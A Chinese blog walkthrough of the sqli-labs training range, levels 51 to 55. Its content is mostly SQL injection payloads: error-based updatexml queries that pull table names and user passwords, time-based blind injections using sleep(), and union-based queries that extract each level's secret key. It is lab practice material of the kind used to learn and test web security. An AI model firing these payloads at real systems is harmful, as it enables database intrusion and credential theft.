首页 > 数据库 >sqli-labs靶场(51-55)

sqli-labs靶场(51-55)

时间:2024-09-01 13:51:50浏览次数:13  
标签:name 51 labs sqli concat --+ table select schema

51关

这关跟50关一样采用报错来查看

Less-51/?sort=1 and updatexml(1,concat(1,(select database())),1)--+

查表/Less-51/?sort=1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

查列

/Less-51/?sort=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

查询username,password

/Less-51/?sort=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

52关

这里没有报错没办法只能采用盲注来进行

/Less-52/?sort=1’ and if((ascii(substr(database(),1,1))=115),sleep(6),1) --+

解析表名:?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)--+ 第一位是 e

解析字段名:?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)--+ 第一位是 i

获取数据: ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)--+

53关

解析数据库名称:?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)--+ 第一位是 s

解析表名:?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)--+ 第一位是 e

解析字段名:?sort=1 'and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)--+ 第一位是 i

54关

从54关开始,关卡开始有了难度,54关仅允许我们输入十次语句,十次语句时候该靶场就会对里面所有的库名,表名,列名进行一个刷新。所以从这关开始,所有的语句仅供参考。

这里爆到表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where%20table_schema=database() and table_name='r4bsp4sllk'--+  爆列名

?id=-1%27union%20select%201,group_concat(secret_C4O5),3%20from%20m3xab4chhv--+   获取key值

查到key把它复制到下面的框里提交就过关了

55关

这里跟上一关一样每个人的表列都不一样这里是 )闭合方式

?id=-1)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+  爆表

?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='y3a9eaki2l'--+   爆到列

然后查询key的值进行提交

?id=-1) union select 1,group_concat(secret_4I3C),3 from y3a9eaki2l--+

标签:name,51,labs,sqli,concat,--+,table,select,schema
From: https://blog.csdn.net/2301_81525518/article/details/141713669

相关文章

  • 51c大模型~合集44
    #DR4SR最佳学生论文解读,中科大、华为诺亚:序列推荐新范式DR4SR本工作由认知智能全国重点实验室IEEEFellow陈恩红团队与华为诺亚方舟实验室完成。陈恩红教授团队深耕数据挖掘、机器学习领域,在顶级期刊与会议上发表多篇论文,谷歌学术论文引用超两万次。诺亚方舟实验室是华为公司从事......
  • [luoguP4051/JSOI2007] 字符加密
    题意给定字符串\(s\),输出将\(s\)的所有循环同构的字符串排序后,每个字符串的末尾的字符。sol因为要对循环同构的字符串排序,因此我们可以将\(s\)复制一遍,拼在后面,计算\(sa\),满足\(sa_i\len\)的所有元素的相对位置即为排序后字符串的相对位置,输出即可\(sa\)的计算详见......
  • 代码随想录day46 || 647 回文子串, 516 最长回文子序列
    647回文字串funccountSubstrings(sstring)int{ //动规五部曲 //dp[i][j]表示s[i:j+1]区间是否是一个回文 //ifs[i]==s[j]{ifi-j<=1||dp[i+1][j-1]==true{dp[i][j]==true}} //初始化为false //从下往上,从左往右 //print varcountint var......
  • 51nod 1204 Parity
    闲话虽然这题好像找不到原题了,但毋庸置疑地说这的确是并查集的好题。分析可以先对奇偶区间进行分析,当这个有偶数个1时,区间\(1-(left-1)\)一定与区间\(1-right\)的奇偶性相同。如此图\(3-4\)为偶区间,根据分析,\(1-2\)为奇区间。\(1-4\)也为奇区间。但如果填入的......
  • sqli-labs通关(41- )
    第四十一关1、判断闭合和列数整数闭合,共有3列2、查看数据库名?id=-1unionselect1,database() --+3、查看数据表名?id=-1unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema='security'--+4、查看users字段名......
  • sqli-labs靶场通关攻略(41-60)
    第四十一关联合查询爆出数据库但这关考察的时堆叠注入,我们给他注入一条数据输入id=50即可查到我们注入的数据 第四十二关看页面似曾相识,上次我们是用注册新用户然后对其他账户进行登录从而造成注入,但这次不能注册新用户了存在堆叠注入函数,所以我们可以在密码哪里......
  • sqlite3数据库
    sqlits3数据库名,创建一个数据库,并打开,有点像vim.headerson  .modecolumn可以让输出的更美观一点  //打开一个数据库文件  ret=sqlite3_open("student.db",&pDb);  if(ret!=SQLITE_OK){    fprintf(stderr,"sqlite3_openfailed!:%s\n",......
  • ASP.NET Core 入门教程三 结合 EFCore 和 SQLite
    ASP.NETCore是一个开源的Web框架,它允许开发者轻松地构建现代、高性能的Web应用程序。EntityFrameworkCore(EFCore)是一个轻量级、可扩展的ORM(对象关系映射)框架,它支持多种数据库。SQLite是一个轻量级的嵌入式数据库,适用于小型应用程序。在本篇文章中,我们将学习如何......
  • sqlite3使用记录
    参考资源SQLite简介|菜鸟教程(runoob.com)Ubuntu下sqlite3的安装及使用安装步骤安装:sudoapt-getinstallsqlite3查看版本:sqlite-version安装Sqlite3编译需要的工具包:sudoapt-getinstalllibsqlite3-dev语法说明注意(1)sqlite语法忽略大小写的区别,除了GLOB等......
  • sqli-labs靶场通关攻略(41-50)
    Less-41 步骤一:查看数据库名?id=-1unionselect1,2,database()--+步骤二:查看表名?id=-1unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+步骤三:查看users表中列名?id=-1unionselect1,group_concat(......